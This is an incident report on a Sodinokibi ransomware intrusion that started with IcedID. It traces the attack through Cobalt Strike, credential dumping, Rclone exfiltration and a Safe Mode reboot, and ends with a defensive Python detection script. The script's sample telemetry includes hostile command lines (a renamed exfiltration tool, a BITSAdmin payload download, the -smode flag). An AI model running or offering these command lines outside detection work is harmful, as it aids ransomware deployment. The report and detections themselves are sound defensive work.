Sodinokibi (aka REvil) has been one of the most prolific ransomware as a service (RaaS) groups over the last couple of years. The ransomware family was purported to be behind the Travelex intrusion, and current reports point to an attack against Acer for a reported $50 million ransom demand.

In March, we observed an intrusion which started with malicious spam that dropped IcedID (Bokbot) into the environment and subsequently allowed access to a group distributing Sodinokibi ransomware. During the intrusion the threat actors escalated privileges to Domain Administrator, exfiltrated data, and used Sodinokibi to ransom all domain joined systems.

The IcedID trojan was first discovered in 2017 and currently operates as an initial access broker for several ransomware families. In our intrusion, the threat actors leveraged malicious spam using an xlsm document which, upon opening and enabling the macro, initiated a wmic command to execute the IcedID trojan from a remote executable posing as a GIF image. Persistence was set up using a scheduled task, and discovery commands were initiated from the malware within minutes of execution.

About an hour and a half after initial access, the malware pulled down Cobalt Strike Beacons from 2 different command and control servers, which were both used throughout the intrusion. Once the Cobalt Strike Beacons were established, lateral movement began, first to an Exchange server, then pivoting to other servers. We did not see the attackers interact with the Exchange application at all, and at first it appeared the attack came from Exchange, but after careful review we assessed the source was indeed IcedID. It appears the threat actors wanted us to believe Exchange was the source of the attack as they pivoted through Exchange to other systems in the domain using Cobalt Strike.

After compromising the Exchange server, the attackers moved to domain controllers and other systems within the environment using SMB and PowerShell Beacons executed via a remote service. The attackers were slightly slowed down by AntiVirus, which ate a couple of Beacons, but the attackers eventually bypassed it using a variation of their lateral movement technique.

Additional discovery was executed from the domain controller using AdFind and the Ping utility to test connections between the domain controller and other domain joined systems. After discovery was completed, credentials were dumped from lsass. After completing these tasks the threat actors began to establish RDP connections between various systems in the domain.

Three and a half hours into the intrusion, the threat actors used Rclone masquerading as a svchost executable to collect and exfiltrate the contents of network shares for use in a double extortion demand.

At the four hour mark, the threat actors began to move on to final objectives. They staged the ransomware executable on a domain controller and then used BITSAdmin to download it to each system in the domain. After that, the threat actors used RDP to open a cmd or PowerShell process to execute the Sodinokibi ransomware using a particular flag, -smode, which, when executed, wrote a couple of RunOnce registry keys and then immediately rebooted the system into Safe Mode with Networking.

Booting into Safe Mode with Networking blocked the startup of security tools and other management agents. Encryption did not start immediately after reboot but required a user to log in, which in this case the threat actors completed by logging in after the reboot.
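The final-objective behaviour above (BITSAdmin staging, the -smode flag, RunOnce writes before the Safe Mode reboot, and Rclone renamed to svchost) can be turned into endpoint detection rules. The following is an added example written for this page, not code from the report; the telemetry records, value names and hostnames are constructed, and the record layout is an assumed, simplified process/registry event shape rather than any vendor's schema.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry (not from the report). Each record is a
# simplified process-creation or registry-set event.
EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},                       # legitimate
    {"id": 2, "type": "process", "image": r"C:\Users\Public\svchost.exe",
     "cmdline": "svchost.exe copy C:\\Shares\\Finance remote:exfil"},  # renamed tool
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job \\DC01-PLACEHOLDER\share\x.exe C:\Windows\Temp\x.exe"},
    {"id": 4, "type": "process", "image": r"C:\Windows\Temp\x.exe",
     "cmdline": "x.exe -smode"},
    {"id": 5, "type": "registry", "image": r"C:\Windows\Temp\x.exe",
     "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\PLACEHOLDER"},
]

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

def masqueraded_svchost(ev):
    """svchost.exe only lives in System32/SysWOW64; any other path is a masquerade."""
    p = PureWindowsPath(ev["image"])
    return p.name.lower() == "svchost.exe" and str(p.parent).lower() not in SYSTEM_DIRS

def bits_download(ev):
    """bitsadmin /transfer is the built-in BITS download the actors used for staging."""
    name = PureWindowsPath(ev["image"]).name.lower()
    return ev["type"] == "process" and name == "bitsadmin.exe" and "/transfer" in ev["cmdline"].lower()

def safe_mode_flag(ev):
    """Standalone -smode switch on a command line (word-bounded to avoid substrings)."""
    return ev["type"] == "process" and re.search(r"(^|\s)-smode(\s|$)", ev["cmdline"]) is not None

def runonce_write(ev):
    """Value written under a RunOnce key: the reboot-persistence step before Safe Mode."""
    return ev["type"] == "registry" and "\\currentversion\\runonce\\" in ev["key"].lower()

RULES = {"masqueraded_svchost": masqueraded_svchost, "bits_download": bits_download,
         "safe_mode_flag": safe_mode_flag, "runonce_write": runonce_write}

def scan(events):
    """Return (rule_name, event_id) for every matching record, in event order."""
    return [(name, ev["id"]) for ev in events for name, rule in RULES.items() if rule(ev)]

def safe_mode_chain(findings):
    """High-confidence correlation: staging download, -smode launch and RunOnce write all seen."""
    seen = {name for name, _ in findings}
    return {"bits_download", "safe_mode_flag", "runonce_write"} <= seen
```

The single rules are noisy on their own (BITSAdmin has legitimate uses), so `safe_mode_chain` is the alert-worthy signal; the per-rule hits are what the analyst pivots on.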